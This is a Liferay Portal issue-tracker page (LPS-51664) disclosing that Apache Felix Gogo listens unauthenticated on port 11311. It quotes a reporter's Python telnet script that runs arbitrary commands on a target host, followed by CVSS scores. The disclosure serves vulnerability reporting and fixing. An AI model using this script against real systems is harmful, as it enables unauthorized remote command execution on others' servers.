Uploaded image for project: 'PUBLIC - Liferay Portal Community Edition'
  1. PUBLIC - Liferay Portal Community Edition
  2. LPS-51664

Felix listens on 0.0.0.0:11311 and not does not require authentication

    Details

      Description

      Original message from Bryan Alexander <shodivine@gmail.com>

      import telnetlib
      import sys
      
      """ 
      Liferay Portal 7.0 exposes Apache Felix Gogo without authentication, listening
      on 0.0.0.0:11311.  This interface can be used to compromise the host.
      """
      
      if len(sys.argv) < 2:
          print '[%s] <rhost> <cmd>' % sys.argv[0]
          print '[!] Prepend cmd.exe /C || /bin/bash -c depending on env'
          sys.exit(1)
      
      rhost = sys.argv[1]
      cmd = sys.argv[2]
      
      try:
          print '[!] Connecting (might be slow)...'
          tn = telnetlib.Telnet(host=rhost, port=11311)
          tn.read_until('g! ')
      
          print '[+] Connected, executing...'
          tn.write('exec "%s"\n' % cmd)
          print tn.read_until('g! ')
          tn.close()
      except Exception, e:
          print '[-] Failed to connect: %s' % e
          sys.exit(1)
      

      CVSS Base Score: 9.4
      CVSS Temporal Score: 7.4
      CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:N/E:P/RL:OF/RC:C)
      

        Attachments

          Activity

            People

            • Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved:
                Days since last comment:
                4 years, 25 weeks, 6 days ago

                Packages

                Version Package
                7.0.0 M4